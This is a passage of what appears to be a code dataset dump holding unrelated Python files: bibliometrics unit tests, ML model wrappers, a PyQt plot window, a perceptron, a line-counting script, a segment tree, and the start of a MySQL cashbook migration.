paper.title == (\n 'Plasma equilibrium reconstruction for the nuclear fusion of ' +\n 'magnetically confined hydrogen isotopes'\n )\n paper = Paper.fetch(doi='10.1016/j.ijhydene.2016.06.178')\n assert paper.title == (\n 'Plasma equilibrium reconstruction for the nuclear fusion of ' +\n 'magnetically confined hydrogen isotopes'\n )\n\n def test_str(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestPaper.test_str')\n paper_table = DBTable.get_table_object('paper', self.manager)\n new_paper = Paper(\n table=paper_table,\n fields_dict={\n 'title': \"A New Paper\",\n 'doi': \"10.1231/12312\"\n })\n\n assert str(new_paper) == (\n 'A New Paper (10.1231/12312)'\n )\n\n def test_authors(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestPaper.test_authors')\n paper = Paper.fetch(\n where_dict={'doi': '10.1089/ars.2017.7361'}\n )\n assert len(paper.authors) == 2\n\n new_paper = Paper(\n fields_dict={\n 'title': \"A New Paper\",\n 'doi': \"10.1231/12312\"\n }\n )\n assert len(new_paper.authors) == 0\n\n def test_journal(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestPaper.test_journal')\n paper = Paper.fetch(\n where_dict={'doi': '10.1089/ars.2017.7361'}\n )\n assert paper.journal.title == 'ANTIOXIDANTS & REDOX SIGNALING'\n\n def test_cited_papers(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestPaper.test_cited_papers')\n paper = Paper.fetch(\n where_dict={'doi': '10.1089/ars.2017.7361'}\n )\n assert len(paper.cited_papers) == 177\n\n new_paper = Paper(\n fields_dict={\n 'title': \"A New Paper\",\n 'doi': \"10.1231/12312\"\n }\n )\n assert len(new_paper.cited_papers) == 0\n\n def test_citing_papers(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestPaper.test_citing_papers')\n paper = Paper.fetch(\n where_dict={'doi': '10.1016/j.ijhydene.2016.06.178'}\n )\n assert len(paper.citing_papers) == 5\n\n new_paper = Paper(\n fields_dict={\n 'title': \"A New Paper\",\n 'doi': \"10.1231/12312\"\n }\n )\n assert len(new_paper.citing_papers) == 0\n\n def test_cite(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestPaper.test_cite')\n source_paper = Paper.fetch(\n where_dict={'doi': '10.1016/j.ijhydene.2016.06.178'}\n )\n target_paper = Paper.fetch(\n where_dict={'doi': '10.1016/j.ijhydene.2016.07.026'}\n )\n new_citation = source_paper.cite(target_paper)\n new_citation.save_to_db()\n\n found = False\n for paper in source_paper.cited_papers:\n if paper.doi == '10.1016/j.ijhydene.2016.07.026':\n found = True\n break\n assert found\n\n found = False\n for paper in target_paper.citing_papers:\n if paper.doi == '10.1016/j.ijhydene.2016.06.178':\n found = True\n break\n assert found\n\n new_paper = Paper()\n with pytest.raises(exceptions.DBUnsyncedError):\n new_paper.cite(target_paper)\n with pytest.raises(exceptions.DBUnsyncedError):\n source_paper.cite(new_paper)\n\n with pytest.raises(TypeError):\n source_paper.cite(\"hello\")\n\n@pytest.mark.usefixtures('class_manager')\nclass TestAuthor():\n \"\"\"\n Unit tests for Author class.\n \"\"\"\n def test_init(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestAuthor.test_init')\n author_table = DBTable.get_table_object('author', self.manager)\n\n new_author = Author(\n manager=self.manager\n )\n assert isinstance(new_author, Author)\n\n new_author = Author(\n table=author_table\n )\n assert isinstance(new_author, Author)\n\n new_author = Author(\n table=author_table,\n fields_dict={\n 'last_name': 'Thicke',\n 'given_names': 'Mike'\n }\n )\n assert isinstance(new_author, Author)\n assert new_author.last_name == 'Thicke'\n\n new_author = Author(\n table=author_table,\n row_key='idauthor' + DBTable.KEY_STR_DELIMITER + '1'\n )\n assert isinstance(new_author, Author)\n assert new_author.last_name\n\n def test_str(self):\n logging.getLogger('bibliom.pytest').debug('-->TestAuthor.test_str')\n new_author = Author(\n manager=self.manager,\n fields_dict={\n 'last_name': 'Thicke',\n 'given_names': 'Michael Lowell Ellis'\n }\n )\n assert str(new_author) == 'Thicke, Michael Lowell Ellis'\n\n def test_from_string(self):\n logging.getLogger('bibliom.pytest').debug('-->TestAuthor.test_from_string')\n author_table = DBTable.get_table_object('author', self.manager)\n new_author = Author.from_string(author_table, 'Thicke, Michael Lowell Ellis')\n assert new_author.last_name == 'Thicke'\n assert new_author.given_names == 'Michael Lowell Ellis'\n\n new_author = Author.from_string(author_table, 'IPCC')\n assert new_author.corporate\n assert new_author.last_name == 'IPCC'\n\n def test_papers(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestAuthor.test_papers')\n author_table = DBTable.get_table_object('author', self.manager)\n\n author = Author(\n table=author_table,\n row_key='idauthor' + author_table.KEY_STR_DELIMITER + '1'\n )\n assert len(author.papers) == 1\n\n new_author = Author(\n manager=self.manager,\n fields_dict={\n 'last_name': 'Thicke',\n 'given_names': 'Michael Lowell Ellis'\n }\n )\n assert len(new_author.papers) == 0\n\n@pytest.mark.usefixtures('class_manager')\nclass TestJournal():\n \"\"\"\n Unit tests for Journal class.\n \"\"\"\n def test_init(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestJournal.test_init')\n journal_table = DBTable.get_table_object('journal', self.manager)\n\n journal = Journal(manager=self.manager)\n assert isinstance(journal, Journal)\n\n journal = Journal(table=journal_table)\n assert isinstance(journal, Journal)\n\n journal = Journal(\n table=journal_table,\n row_key='idjournal' + journal_table.KEY_STR_DELIMITER + '1')\n assert isinstance(journal, Journal)\n assert isinstance(journal.title, str)\n\n new_journal = Journal(\n table=journal_table,\n fields_dict={\n 'title': 'A Journal'\n }\n )\n assert new_journal.title == 'A Journal'\n\n def test_papers(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestJournal.test_papers')\n journal_table = DBTable.get_table_object('journal', self.manager)\n\n journal = Journal.fetch(\n table=journal_table,\n where_dict={\n 'issn': '1876-6102'\n }\n )\n assert len(journal.papers) == 148\n\n@pytest.mark.usefixtures('class_manager')\nclass TestCitation():\n \"\"\"\n Unit tests for Citation class.\n \"\"\"\n def test_init(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestCitation.test_init')\n citation_table = DBTable.get_table_object('citation', self.manager)\n\n citation = Citation(table=citation_table)\n assert isinstance(citation, Citation)\n\n citation = Citation(manager=self.manager)\n assert isinstance(citation, Citation)\n\n citation = Citation(\n table=citation_table,\n row_key=('source_id' +\n citation_table.KEY_STR_DELIMITER +\n 'target_id' +\n citation_table.KEY_STR_DELIMITER +\n '68' +\n citation_table.KEY_STR_DELIMITER +\n '75')\n )\n assert isinstance(citation, Citation)\n\n new_citation = Citation(\n table=citation_table,\n fields_dict={\n 'source_id': 100,\n 'target_id': 200\n }\n )\n assert isinstance(new_citation, Citation)\n assert new_citation.source_id == 100\n assert new_citation.target_id == 200\n\n def test_cite(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestCitation.test_cite')\n citation_table = DBTable.get_table_object('citation', self.manager)\n\n source_paper = Paper.fetch(\n where_dict={'doi': '10.1016/j.ijhydene.2016.06.178'}\n )\n target_paper = Paper.fetch(\n where_dict={'doi': '10.1016/j.ijhydene.2016.07.026'}\n )\n\n new_citation = Citation(table=citation_table)\n new_citation.cite(source_paper, target_paper)\n assert new_citation.source_id == source_paper.idpaper\n assert new_citation.target_id == target_paper.idpaper\n\n def test_source_paper_target_paper(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestCitation.test_source_paper_target_paper')\n citation_table = DBTable.get_table_object('citation', self.manager)\n paper_table = DBTable.get_table_object( 'paper', self.manager)\n\n citation = Citation(\n table=citation_table,\n row_key=('source_id' +\n citation_table.KEY_STR_DELIMITER +\n 'target_id' +\n citation_table.KEY_STR_DELIMITER +\n '68' +\n citation_table.KEY_STR_DELIMITER +\n '75')\n )\n source_paper = citation.source_paper\n assert source_paper.idpaper == 68\n assert source_paper.doi == '10.1140/epja/i2017-12405-4'\n target_paper = citation.target_paper\n assert target_paper.idpaper == 75\n assert target_paper.doi == '10.1088/1674-1137/41/11/113104'\n\n paper_1 = Paper(\n table=paper_table,\n row_key='idpaper' + DBTable.KEY_STR_DELIMITER + '1'\n )\n paper_2 = Paper(\n table=paper_table,\n row_key='idpaper' + DBTable.KEY_STR_DELIMITER + '2'\n )\n citation = Citation(table=citation_table)\n citation.source_paper = paper_1\n citation.target_paper = paper_2\n assert citation.source_id == 1\n assert citation.target_id == 2\n citation.save_to_db()\n assert paper_2 in paper_1.cited_papers\n assert paper_1 in paper_2.citing_papers\n","sub_path":"tests/test_publication_objects.py","file_name":"test_publication_objects.py","file_ext":"py","file_size_in_byte":13039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"107337914","text":"import numpy as np\nimport pandas as pd\n\nclass MEnsamble:\n def __init__(self, Model, n, ws, bins, **kwparams):\n self.n = kwparams.get('n', n)\n self.Model = kwparams.get('Model', Model)\n self.ms = None\n self.idxs = None\n self.__updateN__(**kwparams)\n self.ws = kwparams.get('ws', ws)\n self.bins = kwparams.get('bins', bins)\n\n def __updateN__(self, **kwparams):\n self.ms = [self.Model(**kwparams) for i in range(self.n)]\n self.idxs = [[] for i in range(self.n)]\n\n def splitDataset(self, y):\n bres = [(y > (self.bins[i] - 1e-10)) & (y <= self.bins[i + 1]) for i in range(len(bins) - 1)]\n for i in range(self.n):\n res = []\n for j, w in enumerate(self.ws):\n res.append(np.random.choice(\n np.where(bres[j])[0],\n np.min([w, bres[j].sum()]),\n replace=False))\n # print(bres[j].sum(),w,len(res[-1]))\n self.idxs[i] = np.hstack(res)\n\n def fit(self, X, y, splitDataset=True):\n self.splitDataset(y)\n for m, idx in zip(self.ms, self.idxs):\n m.fit(X[idx], y[idx])\n\n def predict(self, X):\n yp = [m.predict(X) for m in self.ms]\n return np.median(yp, axis=0)\n\n def set_params(self, **params):\n m_keys = {}\n for p in params:\n assert not (hasattr(self, p) and hasattr(self.ms[0], p))\n if hasattr(self, p):\n self.__setattr__(p, params[p])\n if p == 'n':\n self.__updateN__()\n else:\n m_keys[p] = params[p]\n for m in self.ms:\n m.set_params(**m_keys)\n\n\nclass Model_Wrapper(object):\n def __init__(self, model, columns, X_scaler, Y_scaler):\n self.model = model\n self.columns = columns\n\n self.X_scaler = X_scaler\n\n self.Y_scaler = Y_scaler\n\n def predict(self, X):\n X = X[self.columns]\n\n Xs = self.X_scaler.transform(X)\n yp = self.model.predict(Xs)\n\n ys = self.Y_scaler.transform(yp)\n y = pd.DataFrame(ys)\n return y\n\n\nclass NoScale:\n def transform(self, x, *args, **kwargs):\n return x","sub_path":"aux/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"228336527","text":"from PyQt4.QtCore import Qt\nfrom PyQt4.QtGui import QMainWindow, QDockWidget, QTabWidget\nfrom ert_gui.models.connectors.init import CaseSelectorModel\nfrom ert_gui.tools.plot import PlotPanel, DataTypeKeysWidget, CaseSelectionWidget, PlotMetricsWidget, ScaleTracker\nfrom ert_gui.tools.plot.data import PlotDataFetcher\nfrom ert_gui.widgets.util import may_take_a_long_time\n\n\nclass PlotWindow(QMainWindow):\n def __init__(self, parent):\n QMainWindow.__init__(self, parent)\n\n self.setMinimumWidth(750)\n self.setMinimumHeight(500)\n\n self.setWindowTitle(\"Plotting\")\n self.activateWindow()\n\n self.__central_tab = QTabWidget()\n self.setCentralWidget(self.__central_tab)\n\n\n self.__plot_panels = []\n\n self.addPlotPanel(\"Ensemble plot\", \"gui/plots/simple_plot.html\", short_name=\"Plot\")\n self.addPlotPanel(\"Ensemble overview plot\", \"gui/plots/simple_overview_plot.html\", short_name=\"oPlot\")\n self.addPlotPanel(\"Histogram\", \"gui/plots/histogram.html\", short_name=\"Histogram\")\n self.addPlotPanel(\"RFT plot\", \"gui/plots/rft.html\", short_name=\"RFT\")\n self.addPlotPanel(\"RFT overview plot\", \"gui/plots/rft_overview.html\", short_name=\"oRFT\")\n\n self.__data_type_keys_widget = DataTypeKeysWidget()\n self.__data_type_keys_widget.dataTypeKeySelected.connect(self.keySelected)\n self.addDock(\"Data types\", self.__data_type_keys_widget)\n\n current_case = CaseSelectorModel().getCurrentChoice()\n self.__case_selection_widget = CaseSelectionWidget(current_case)\n self.__case_selection_widget.caseSelectionChanged.connect(self.caseSelectionChanged)\n self.addDock(\"Plot case\", self.__case_selection_widget)\n\n self.__plot_metrics_widget = PlotMetricsWidget()\n self.__plot_metrics_widget.plotScalesChanged.connect(self.scalesChanged)\n self.__plot_metrics_widget.reportStepTimeChanged.connect(self.reportStepTimeChanged)\n self.addDock(\"Plot metrics\", self.__plot_metrics_widget)\n\n self.__data_type_key = None\n self.__plot_cases = self.__case_selection_widget.getPlotCaseNames()\n self.__value_scale_tracker = ScaleTracker(\"Value\")\n self.__time_scale_tracker = ScaleTracker(\"Time\")\n self.__depth_scale_tracker = ScaleTracker(\"Depth\")\n\n\n def addPlotPanel(self, name, path, short_name=None):\n if short_name is None:\n short_name = name\n\n plot_panel = PlotPanel(name, short_name, path)\n plot_panel.plotReady.connect(self.plotReady)\n self.__plot_panels.append(plot_panel)\n self.__central_tab.addTab(plot_panel, name)\n\n\n def addDock(self, name, widget, area=Qt.LeftDockWidgetArea, allowed_areas=Qt.AllDockWidgetAreas):\n dock_widget = QDockWidget(name)\n dock_widget.setObjectName(\"%sDock\" % name)\n dock_widget.setWidget(widget)\n dock_widget.setAllowedAreas(allowed_areas)\n dock_widget.setFeatures(QDockWidget.DockWidgetFloatable | QDockWidget.DockWidgetMovable)\n\n self.addDockWidget(area, dock_widget)\n return dock_widget\n\n\n def checkPlotStatus(self):\n for plot_panel in self.__plot_panels:\n if not plot_panel.isReady():\n return False\n\n if len(self.__plot_cases) == 0:\n return False\n\n return True\n\n def plotReady(self):\n if self.checkPlotStatus():\n self.__data_type_keys_widget.selectDefault()\n\n\n def caseSelectionChanged(self):\n self.__plot_cases = self.__case_selection_widget.getPlotCaseNames()\n self.keySelected(self.__data_type_key)\n\n def scalesChanged(self):\n value_min = self.__plot_metrics_widget.getValueMin()\n value_max = self.__plot_metrics_widget.getValueMax()\n time_min = self.__plot_metrics_widget.getTimeMin()\n time_max = self.__plot_metrics_widget.getTimeMax()\n depth_min = self.__plot_metrics_widget.getDepthMin()\n depth_max = self.__plot_metrics_widget.getDepthMax()\n\n self.__value_scale_tracker.setScaleValues(self.__data_type_key, value_min, value_max)\n self.__time_scale_tracker.setScaleValues(self.__data_type_key, time_min, time_max)\n self.__depth_scale_tracker.setScaleValues(self.__data_type_key, depth_min, depth_max)\n\n\n for plot_panel in self.__plot_panels:\n plot_panel.setScales(time_min, time_max, value_min, value_max, depth_min, depth_max)\n\n\n def reportStepTimeChanged(self):\n t = self.__plot_metrics_widget.getSelectedReportStepTime()\n\n for plot_panel in self.__plot_panels:\n plot_panel.setReportStepTime(t)\n\n\n def showOrHidePlotTab(self, plot_panel, is_visible, show_plot):\n plot_panel.setPlotIsVisible(show_plot)\n if show_plot and not is_visible:\n index = self.__plot_panels.index(plot_panel)\n self.__central_tab.insertTab(index, plot_panel, plot_panel.getName())\n elif not show_plot and is_visible:\n index = self.__central_tab.indexOf(plot_panel)\n self.__central_tab.removeTab(index)\n\n @may_take_a_long_time\n def keySelected(self, key):\n self.__data_type_key = str(key)\n\n plot_data_fetcher = PlotDataFetcher()\n for plot_panel in self.__plot_panels:\n visible = self.__central_tab.indexOf(plot_panel) > -1\n\n if plot_data_fetcher.isSummaryKey(self.__data_type_key):\n show_plot = plot_panel.supportsPlotProperties(time=True, value=True, histogram=True)\n self.showOrHidePlotTab(plot_panel, visible, show_plot)\n\n elif plot_data_fetcher.isBlockObservationKey(self.__data_type_key):\n show_plot = plot_panel.supportsPlotProperties(depth=True, value=True)\n self.showOrHidePlotTab(plot_panel, visible, show_plot)\n\n elif plot_data_fetcher.isGenKWKey(self.__data_type_key):\n show_plot = plot_panel.supportsPlotProperties(histogram=True)\n self.showOrHidePlotTab(plot_panel, visible, show_plot)\n\n elif plot_data_fetcher.isGenDataKey(self.__data_type_key):\n show_plot = plot_panel.supportsPlotProperties(time=True, value=True)\n self.showOrHidePlotTab(plot_panel, visible, show_plot)\n\n else:\n raise NotImplementedError(\"Key %s not supported.\" % self.__data_type_key)\n\n value_min = self.__value_scale_tracker.getMinimumScaleValue(self.__data_type_key)\n value_max = self.__value_scale_tracker.getMaximumScaleValue(self.__data_type_key)\n time_min = self.__time_scale_tracker.getMinimumScaleValue(self.__data_type_key)\n time_max = self.__time_scale_tracker.getMaximumScaleValue(self.__data_type_key)\n depth_min = self.__depth_scale_tracker.getMinimumScaleValue(self.__data_type_key)\n depth_max = self.__depth_scale_tracker.getMaximumScaleValue(self.__data_type_key)\n\n self.__plot_metrics_widget.updateScales(time_min, time_max, value_min, value_max, depth_min, depth_max)\n\n\n if self.checkPlotStatus():\n data = plot_data_fetcher.getPlotDataForKeyAndCases(self.__data_type_key, self.__plot_cases)\n data.setParent(self)\n\n for plot_panel in self.__plot_panels:\n plot_panel.setPlotData(data)\n\n","sub_path":"devel/python/python/ert_gui/tools/plot/plot_window.py","file_name":"plot_window.py","file_ext":"py","file_size_in_byte":7277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"278187008","text":"from func import *\n\n\nclass Perceptron:\n def __init__(self, length, i=0, h=0.75):\n self.h = h # Сдвиг\n self.i = i # Храним порядковый номер персептрона\n self.weight = init_weight(length) # Инициализируем веса для текущего персептрона\n\n # Функция обучения\n def train(self, X, number, epochs=1, n=1):\n target = read_target(number) # Читаем данные, которые мы хотим получить от текущего персептрона\n for epoch in range(epochs): # Пробегаем по каждой эпохе\n net_y = net(X, self.weight) + ((-1) * self.h) # Суммируем произведения Xi*Wi\n z = activation_fun(net_y, self.h) # Предсказание персептрона (ступенчатая функция)\n err = target[self.i] - z # Получаем ошибку\n for i in range(len(self.weight)): # Пробегаем по всем весам и подстраиваем их\n self.weight[i] += err * X[i] * n\n self.h += err * (-1) * n # Также подстроим сдвиг\n\n # Функция получаения ответа\n def get_answer(self, X):\n net_y = net(X, self.weight) - self.h # Суммируем произведения Xi*Wi\n z = activation_fun(net_y, self.h) # Предсказание персептрона (ступенчатая функция)\n return z\n","sub_path":"lab_1/perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"513677678","text":"# #SUMMARY\r\n# Napisz program, który odczytuje wszystkie pliki stworzone przez Ciebie podczas\r\n# feriechallenge - przeszukuje lokalne katalogi lub łączy się w tym celu z Githubem.\r\n# Postaraj się jak najmniej hardcodować i na przykład nie podawaj listy wszystkich plików ręcznie\r\n# Następnie wykorzystując swój sposób katalogowania programów automat odczytuje\r\n# i wyświetla takie informacje:\r\n# - do ilu zadań z 10 napisało się kod\r\n# - liczba linijek kodu napisanych w każdym zadaniu (bez uwzględniania pustych!)\r\n# oraz sumaryczna liczba linijek\r\n# - liczba unikalnych słów użytych we wszystkich programach oraz najczęściej występujące słowo\r\n# - lista i liczba słów kluczowych użyta podczas ca��ego challenge (wykorzystaj moduł keywords)\r\n# - lista i liczba zaimportowanych modułów we wszystkich programach\r\n# Propozycja rozszerzenia: Po prostu miej odwagę i pochwal się outputem swojego programu!\r\n# - opublikuj posta z tagiem #feriechallenge i zostaw lajka na naszej stronie,\r\n# będzie nam miło 🙂 Możesz też oczywiście umieścić jakieś dodatkowe statystyki.\r\nfrom os import listdir\r\nfrom os.path import isfile, join\r\nimport keyword\r\n\r\nglobal_content = []\r\n\r\n\r\ndef filtered_code(content):\r\n filtered = []\r\n for line in content:\r\n if str(line).startswith('#'):\r\n continue\r\n if len(line) < 2:\r\n continue\r\n else:\r\n filtered.append(line.strip())\r\n return filtered\r\n\r\n\r\ndef word_count(content):\r\n wordsAndCount = {}\r\n \r\n for line in content:\r\n words_list = str(line).split()\r\n for word in words_list:\r\n wordd = word.strip(\"[](),.+-//='\")\r\n if wordd.isalpha():\r\n try:\r\n wordsAndCount[wordd] += 1\r\n except KeyError:\r\n wordsAndCount[wordd] = 1\r\n else:\r\n continue\r\n return wordsAndCount\r\n\r\n\r\ndef key_word_count(content):\r\n keyWordsCount = {}\r\n \r\n for line in content:\r\n words_list = str(line).split()\r\n for word in words_list:\r\n wordd = word.strip(\"[](),.+-=//'\")\r\n if keyword.iskeyword(wordd):\r\n try:\r\n keyWordsCount[wordd] += 1\r\n except KeyError:\r\n keyWordsCount[wordd] = 1\r\n else:\r\n continue\r\n\r\n return keyWordsCount\r\n\r\ndef imported_modules(content):\r\n importedModules={}\r\n for lines in content:\r\n for line in lines:\r\n if str(line).startswith('import'):\r\n word = line[7:]\r\n try:\r\n importedModules[word] += 1\r\n except KeyError:\r\n importedModules[word] = 1\r\n if str(line).startswith('from'):\r\n word = line[5:str(line).index('import')-1]\r\n try:\r\n importedModules[word] += 1\r\n except KeyError:\r\n importedModules[word] = 1\r\n else:\r\n continue\r\n return importedModules\r\n \r\nbaseDir = 'C:\\\\Projects\\\\Python\\\\HardCode\\\\scripts\\\\'\r\nonlyfiles = [f for f in listdir(baseDir) if isfile(join(baseDir, f)) if f.upper().endswith('.PY')]\r\ni = 0\r\nsummaryLine = 0\r\nsummaryLineCode = 0\r\n\r\nfor file in onlyfiles:\r\n i += 1\r\n print('\\n', '-'*10, i, file, '-'*10)\r\n with open(baseDir+file, \"r\") as file:\r\n content = file.readlines()\r\n summaryLine += len(content)\r\n print(len(content), ': number of lines')\r\n filtered = filtered_code(content)\r\n summaryLineCode += len(filtered)\r\n print(len(filtered), ': number of code lines', '\\n', '-'*40)\r\n global_content.append(filtered)\r\n \r\nwords = word_count(global_content)\r\nmodules = imported_modules(global_content)\r\ninverse = {value: key for key, value in words.items()}\r\n\r\nprint('imported modules:', modules)\r\nprint ('keywords: ',key_word_count(global_content))\r\nprint('-'*10)\r\nprint('summary lines = ', summaryLine)\r\nprint('summary lines code = ', summaryLineCode)\r\nprint('Unique words in file: ', len(words))\r\nprint('max counted word: ', inverse[max(inverse.keys())],'-',max(inverse.keys()))\r\nprint('Imports count:', words['import'])\r\n","sub_path":"summary.py","file_name":"summary.py","file_ext":"py","file_size_in_byte":4271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"168242334","text":"import os\nimport json\nimport numpy as np\nimport random\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torchvision import models, transforms\n\nfrom PIK3CA_mutation.data_reader import ClsDataset\nfrom PIK3CA_mutation.utils import get_modelpath, net_prediction_oneshop, patient_res_m3_oneshop, save_results\n\n\ndef start_model(datapath, sampling_file, root_dir, model_type, seed=2020, gpu=\"0\", net=\"resnet18\",\n num_classes=2, num_workers=4, batch_size=256, norm_mean=[0.8201, 0.5207, 0.7189],\n norm_std=[0.1526, 0.1542, 0.1183]):\n \"\"\"\n Arguments:\n model_type: 'PIK3CA_Mutation', 'BLIS', 'IM', 'LAR', 'MES'\n net: resnet18, alexnet, resnet34, inception_v3\n\n Results:\n root_dir: ./FUSCC001_models/\n patch.json: ${root_dir}/${model_type}/patch.json\n patch.npz: ${root_dir}/${model_type}/patch.npz\n patient.json: ${root_dir}/${model_type}/patient.json\n patient.npz: ${root_dir}/${model_type}/patient.npz\n \"\"\"\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n\n preprocess = transforms.Compose([\n transforms.Resize((256, 256)),\n transforms.ToTensor(), # Operated on original image, rewrite on previous transform.\n transforms.Normalize(norm_mean, norm_std)])\n\n print('Loading data...')\n testset = ClsDataset(sampling_file, datapath, preprocess)\n testloader = DataLoader(testset, batch_size=batch_size, shuffle=False, num_workers=num_workers)\n\n net = getattr(models, net)(pretrained=False, num_classes=num_classes)\n modelpath = get_modelpath(model_type)\n print('Loading model...', modelpath)\n\n if len(gpu) > 1:\n net = torch.nn.DataParallel(net).cuda()\n net.load_state_dict(torch.load(modelpath)) # load the finetune weight parameters\n else:\n net = net.cuda()\n net.load_state_dict({k.replace('module.',''):v for k,v in torch.load(modelpath).items()})\n\n # Patch Output: patch.json / patch.npz\n scores_patch, predictions_patch, namelist_patch = net_prediction_oneshop(testloader, net, num_classes)\n\n patch_results = save_results(namelist_patch, scores_patch[:, 1], predictions_patch, num_classes)\n with open(os.path.join(root_dir, model_type, 'patch.json'), 'w') as f:\n json.dump(patch_results, f)\n\n savename_patch = os.path.join(root_dir, model_type, 'patch.npz')\n np.savez(savename_patch, key_score=scores_patch, key_binpred=predictions_patch, key_namelist=namelist_patch)\n\n # Patient Output: patient.json / patient.npz\n scores_patient, predictions_patient, namelist_patient = patient_res_m3_oneshop(scores_patch, namelist_patch, num_classes)\n patient_results = save_results(namelist_patient, scores_patient[:, 1], predictions_patient, num_classes)\n with open(os.path.join(root_dir, model_type, 'patient.json'), 'w') as f:\n json.dump(patient_results[0], f)\n \n savename_patient = os.path.join(root_dir, model_type, 'patient.npz')\n np.savez(savename_patient, key_score=scores_patient, key_binpred=predictions_patient, key_namelist=namelist_patient)\n\n with open(os.path.join(root_dir, model_type, 'prediction.json'), 'w') as f:\n results = {\n \"model\": model_type,\n \"patient\": patient_results[0],\n \"patch\": patch_results\n }\n json.dump(results, f)\n","sub_path":"PIK3CA_mutation/single_prediction.py","file_name":"single_prediction.py","file_ext":"py","file_size_in_byte":3354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"392658154","text":"for num in range(1, 2):\r\n\r\n time = []\r\n total_flag = 0\r\n asterisk_flag = 0\r\n filename = \"New-Step\" + str(num) + \".txt\"\r\n for line in reversed(list(open(filename))):\r\n if line.startswith('Total (root+branch&cut)'):\r\n total_flag = 1\r\n continue\r\n\r\n if line.startswith('*'):\r\n asterisk_flag = 1\r\n continue\r\n\r\n if total_flag and asterisk_flag and line.startswith('Elapsed time'):\r\n pos1 = line.find('=')\r\n pos2 = line.find('sec.', pos1)\r\n time.append((line[pos1+1:pos2]).strip())\r\n total_flag = 0\r\n asterisk_flag = 0\r\n\r\n print(sum([float(time_point) for time_point in time]))\r\n","sub_path":"extract_time_new.py","file_name":"extract_time_new.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"557363510","text":"\"\"\"\nDefinition of Interval.\nclass Interval(object):\n def __init__(self, start, end):\n self.start = start\n self.end = end\n\"\"\"\nclass SegmentTreeNode(object):\n def __init__(self, start, end, min):\n self.start, self.end, self.min = start, end, min\n self.left, self.right = None, None\n\nclass Solution:\t\n \"\"\"\n @param A, queries: Given an integer array and an Interval list\n The ith query is [queries[i-1].start, queries[i-1].end]\n @return: The result list\n \"\"\"\n\n def build(self, A, start, end):\n if start > end:\n return\n\n root = SegmentTreeNode(start, end, None)\n if start != end:\n mid = (start + end) / 2\n root.left = self.build(A, start, mid)\n root.right = self.build(A, mid+1, end)\n root.min = min(root.left.min, root.right.min)\n else:\n root.min = A[start]\n\n return root\n\n def query(self, root, start, end):\n if root.start == start and root.end == end:\n return root.min\n\n mid = (root.start + root.end) / 2\n lmin, rmin = None, None\n if start <= mid:\n if end <= mid:\n return self.query(root.left, start, end)\n else:\n lmin = self.query(root.left, start, mid)\n \n if end > mid:\n if start > mid:\n return self.query(root.right, start, end)\n else:\n rmin = self.query(root.right, mid+1, end)\n \n return min(lmin, rmin) if lmin is not None and rmin is not None \\\n else max(lmin, rmin)\n \n\n\n def intervalMinNumber(self, A, queries):\n root = self.build(A, 0, len(A)-1)\n\n res = []\n for query in queries:\n res.append(self.query(root, query[0], query[1]))\n\n return res\n \nif __name__ == '__main__':\n s = Solution()\n s.intervalMinNumber([1, 2, 7, 8, 5], [[1,2],[0,4],[2,4]])","sub_path":"SegmentTree/IntervalMinimumNumber.py","file_name":"IntervalMinimumNumber.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"478397494","text":"import MySQLdb\nimport datetime\nfrom decimal import Decimal\n\nfrom db import DBConnector\nfrom model.project import project\n\nclass cashbook:\n \"\"\"現金出納帳モデル\"\"\"\n\n def __init__(self):\n self.attr = {}\n self.attr[\"id\"] = None\n self.attr[\"user_id\"] = None\n self.attr[\"ym\"] = None\n self.attr[\"date\"] = None\n self.attr[\"summary\"] = None\n self.attr[\"detail\"] = None\n self.attr[\"income\"] = None\n self.attr[\"expenses\"] = None\n self.attr[\"amount\"] = None\n self.attr[\"last_updated\"] = None\n\n @staticmethod\n def migrate():\n\n # データベースへの接続とカーソルの生成\n with DBConnector(dbName=None) as con, con.cursor() as cursor:\n # データベース生成\n cursor.execute('CREATE DATABASE IF NOT EXISTS db_%s;' % project.name())\n # 生成したデータベースに移動\n cursor.execute('USE db_%s;' % project.name())\n # テーブル初期化(DROP)\n cursor.execute('DROP TABLE IF EXISTS table_cashbook;')\n # テーブル初期化(CREATE)\n cursor.execute(\"\"\"\n CREATE TABLE `table_cashbook` (\n `id` int(11) unsigned NOT NULL AUTO_INCREMENT,\n `user_id` int(11) unsigned NOT NULL,\n `ym` int(11) NOT NULL,\n `date` date NOT NULL,\n `summary` varchar(255) DEFAULT NULL,\n `detail` text,\n `income` decimal(12,0) NOT NULL DEFAULT '0',\n `expenses` decimal(12,0) NOT NULL DEFAULT '0',\n `amount` decimal(12,0) NOT NULL DEFAULT '0',\n `last_updated` datetime NOT NULL,\n 